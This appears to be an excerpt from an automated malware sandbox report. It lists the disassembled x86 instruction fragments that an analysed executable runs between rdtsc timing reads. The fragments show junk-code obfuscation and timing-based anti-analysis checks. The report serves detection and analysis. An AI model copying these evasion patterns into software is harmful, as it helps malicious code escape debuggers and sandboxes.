Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A61C55 second address: A61C59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A61C59 second address: A61C5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A61C5D second address: A61C78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA3D4D82111h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A62BC7 second address: A62BE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA3D4C68E63h 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A62BE7 second address: A62C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jmp 00007FA3D4D82114h 0x0000000c popad 0x0000000d nop 0x0000000e cld 0x0000000f jl 00007FA3D4D82107h 0x00000015 cmc 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007FA3D4D82108h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 00000014h 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 call 00007FA3D4D8210Dh 0x00000037 js 00007FA3D4D8210Ch 0x0000003d sbb ebx, 398C1DA4h 0x00000043 pop edi 0x00000044 push 00000000h 0x00000046 or dword ptr [ebp+1247F98Ch], edi 0x0000004c jmp 00007FA3D4D82113h 0x00000051 push eax 0x00000052 pushad 0x00000053 push esi 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A62C64 second address: A62C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A62C6D second address: A62C71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A64C6B second address: A64C6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A64C6F second address: A64CB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007FA3D4D82108h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 jnp 00007FA3D4D82106h 0x0000002a push 00000000h 0x0000002c mov ebx, dword ptr [ebp+122D210Ah] 0x00000032 push 00000000h 0x00000034 xor dword ptr [ebp+124502CAh], eax 0x0000003a xchg eax, esi 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A64CB3 second address: A64CB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A64CB9 second address: A64CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A62DF7 second address: A62DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A65B96 second address: A65BA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FA3D4D82106h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A65BA1 second address: A65BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007FA3D4C68E58h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 sbb ebx, 190826C1h 0x00000028 push 00000000h 0x0000002a mov bh, al 0x0000002c push 00000000h 0x0000002e movzx ebx, si 0x00000031 xchg eax, esi 0x00000032 push eax 0x00000033 push edx 0x00000034 jns 00007FA3D4C68E58h 0x0000003a push edx 0x0000003b pop edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A65BE2 second address: A65BE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A65BE8 second address: A65BEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A65BEC second address: A65BFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A65BFC second address: A65C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A65C01 second address: A65C1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3D4D82115h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A67F44 second address: A67F66 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA3D4C68E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FA3D4C68E60h 0x0000000f popad 0x00000010 push eax 0x00000011 push edi 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A69FAF second address: A69FB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A0CAAD second address: A0CAD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3D4C68E5Eh 0x00000009 jmp 00007FA3D4C68E68h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A0CAD7 second address: A0CAEC instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA3D4D82106h 0x00000008 jp 00007FA3D4D82106h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A0952D second address: A0953D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jns 00007FA3D4C68E56h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A0953D second address: A09541 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A09541 second address: A09549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A09549 second address: A09569 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA3D4D8210Ah 0x00000008 jmp 00007FA3D4D82111h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A09569 second address: A09572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A09572 second address: A09576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A7905D second address: A79063 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A79063 second address: A79069 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A79069 second address: A790AF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA3D4C68E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d ja 00007FA3D4C68E62h 0x00000013 jmp 00007FA3D4C68E5Ch 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c pushad 0x0000001d pushad 0x0000001e jmp 00007FA3D4C68E5Bh 0x00000023 jl 00007FA3D4C68E56h 0x00000029 popad 0x0000002a jl 00007FA3D4C68E58h 0x00000030 popad 0x00000031 mov eax, dword ptr [eax] 0x00000033 pushad 0x00000034 push edi 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A790AF second address: A790C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jnc 00007FA3D4D82110h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A7C85F second address: A7C86F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA3D4C68E56h 0x00000008 jg 00007FA3D4C68E56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A7C86F second address: A7C898 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3D4D82114h 0x00000009 jmp 00007FA3D4D82111h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A7CFF8 second address: A7D020 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA3D4C68E56h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push esi 0x0000000e jmp 00007FA3D4C68E62h 0x00000013 push eax 0x00000014 push edx 0x00000015 jc 00007FA3D4C68E56h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A7D2D1 second address: A7D2E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA3D4D82112h 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A7D2E8 second address: A7D301 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E62h 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A7DA3B second address: A7DA41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A7DA41 second address: A7DA45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A7DA45 second address: A7DA68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FA3D4D8211Dh 0x0000000c jmp 00007FA3D4D82117h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A7DA68 second address: A7DA83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FA3D4C68E56h 0x0000000a jmp 00007FA3D4C68E61h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A7DA83 second address: A7DA8D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A7DA8D second address: A7DA91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A8620C second address: A86210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A86210 second address: A86234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push ebx 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA3D4C68E67h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A86234 second address: A86238 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A84EF0 second address: A84EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A84EF6 second address: A84F1C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA3D4D82106h 0x00000008 jmp 00007FA3D4D82114h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jg 00007FA3D4D82112h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A84F1C second address: A84F26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FA3D4C68E56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A84F26 second address: A84F34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA3D4D8210Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A84F34 second address: A84F5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E5Fh 0x00000007 jl 00007FA3D4C68E56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jne 00007FA3D4C68E5Eh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A8522D second address: A85242 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D82111h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A854E7 second address: A854F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A854F1 second address: A85507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 pushad 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a jns 00007FA3D4D82106h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A85507 second address: A85516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jc 00007FA3D4C68E5Eh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A85AE6 second address: A85AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A88E3A second address: A88E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A88E43 second address: A88E4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FA3D4D82106h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A07B2D second address: A07B32 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A8E111 second address: A8E129 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA3D4D82106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop eax 0x0000000e jg 00007FA3D4D8210Eh 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A36A09 second address: A36A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A36A10 second address: A36A2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D82115h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A8F085 second address: A8F097 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA3D4C68E56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A8F097 second address: A8F0B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA3D4D82113h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A8F0B1 second address: A8F0B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A8DA08 second address: A8DA17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A8DA17 second address: A8DA28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FA3D4C68E56h 0x00000009 jno 00007FA3D4C68E56h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A8DA28 second address: A8DA2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A944C3 second address: A944CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007FA3D4C68E56h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A9342C second address: A93430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A93430 second address: A93476 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FA3D4C68E64h 0x00000012 jmp 00007FA3D4C68E5Eh 0x00000017 jmp 00007FA3D4C68E5Ah 0x0000001c jg 00007FA3D4C68E56h 0x00000022 popad 0x00000023 pushad 0x00000024 push eax 0x00000025 pop eax 0x00000026 pushad 0x00000027 popad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A93476 second address: A93491 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA3D4D82110h 0x00000008 jg 00007FA3D4D82106h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A93491 second address: A9349F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jnp 00007FA3D4C68E56h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A5701D second address: A35EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FA3D4D82116h 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007FA3D4D82108h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 mov ecx, dword ptr [ebp+122D355Fh] 0x0000002e call 00007FA3D4D8210Fh 0x00000033 call 00007FA3D4D8210Dh 0x00000038 mov dword ptr [ebp+122D36CCh], ecx 0x0000003e pop edi 0x0000003f pop ecx 0x00000040 lea eax, dword ptr [ebp+12488E64h] 0x00000046 mov edx, dword ptr [ebp+122D2284h] 0x0000004c push eax 0x0000004d jmp 00007FA3D4D82114h 0x00000052 mov dword ptr [esp], eax 0x00000055 push 00000000h 0x00000057 push ebx 0x00000058 call 00007FA3D4D82108h 0x0000005d pop ebx 0x0000005e mov dword ptr [esp+04h], ebx 0x00000062 add dword ptr [esp+04h], 0000001Bh 0x0000006a inc ebx 0x0000006b push ebx 0x0000006c ret 0x0000006d pop ebx 0x0000006e ret 0x0000006f call dword ptr [ebp+122D38D1h] 0x00000075 push ecx 0x00000076 push eax 0x00000077 push edx 0x00000078 push edx 0x00000079 pop edx 0x0000007a rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A57289 second address: A572B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA3D4C68E5Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A575DE second address: A575E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A575E4 second address: A575E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A57696 second address: A576C7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA3D4D8210Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push edi 0x0000000f push edi 0x00000010 jmp 00007FA3D4D8210Eh 0x00000015 pop edi 0x00000016 pop edi 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a push ecx 0x0000001b pushad 0x0000001c popad 0x0000001d pop ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A576C7 second address: A576CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: A576CB second address: A576FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jp 00007FA3D4D82112h 0x00000011 pop eax 0x00000012 and ch, FFFFFFB9h 0x00000015 mov edi, eax 0x00000017 push 8DD05BBCh 0x0000001c pushad 0x0000001d jbe 00007FA3D4D8210Ch 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
